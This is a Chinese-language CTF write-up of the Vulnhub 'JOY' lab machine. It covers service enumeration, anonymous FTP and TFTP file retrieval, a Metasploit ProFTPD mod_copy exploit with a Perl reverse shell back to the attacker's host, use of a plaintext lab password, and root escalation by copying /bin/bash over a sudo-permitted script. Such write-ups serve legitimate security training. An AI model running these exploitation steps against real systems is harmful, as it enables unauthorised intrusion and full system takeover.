[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升

2024-07-25 216 0

信息收集

IP Address Opening Ports
192.168.101.150 TCP:21,22,25,80,110,139,143,445,465,587,993,995

$ nmap -p- 192.168.101.150 --21,22,25,min-rate 1000 -sC -sV

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_pop3-capabilities: CAPA RESP-CODES SASL PIPELINING AUTH-RESP-CODE UIDL STLS TOP
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more IDLE listed have LOGIN-REFERRALS ENABLE post-login LITERAL+ LOGINDISABLEDA0001 ID capabilities Pre-login IMAP4rev1 OK STARTTLS SASL-IR
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_imap-capabilities: IDLE listed more LOGIN-REFERRALS ENABLE post-login LITERAL+ have ID capabilities Pre-login IMAP4rev1 OK AUTH=PLAINA0001 SASL-IR
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA RESP-CODES SASL(PLAIN) USER AUTH-RESP-CODE UIDL PIPELINING TOP
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2024-07-16T13:11:48+08:00
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-07-16T05:11:48
|_  start_date: N/A
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s

ProFTPD 本地权限

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图

$ sudo nmap -Pn -sU -A --top-ports=20 -v 192.168.101.150

snmp泄露有关正在运行的服务的大量信息。

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图1

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图2

$ ftp 192.168.101.150

ftp> get directory

通过匿名登录下载directory

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图3

关于patrick用户directory目录

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图4

$ tftp 192.168.101.150 36969

通过tftp下载文件version_control

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图5

ProFTPD版本为1.3.5

目录/var/www/tryingharderisjoy

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图6

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图7

use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.101.150
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload payload/cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LHOST 192.168.101.128
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图8

www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy

patrick:apollo098765

www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图9

权限提升

patrick@JOY:/tmp$ sudo -l

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图10

$ echo '/bin/bash' >test

$ ftp 192.168.101.150

ftp> cd upload
ftp> put test

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图11

telnet 192.168.101.150 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图12

patrick@JOY:~$ sudo /home/patrick/script/test

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图13

Proof.txt 截屏

[Vulnhub] digitalworld.local-JOY snmp+ProFTPD权限提升插图14

Proof.txt 内容

Never grant sudo permissions on scripts that perform system functions!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论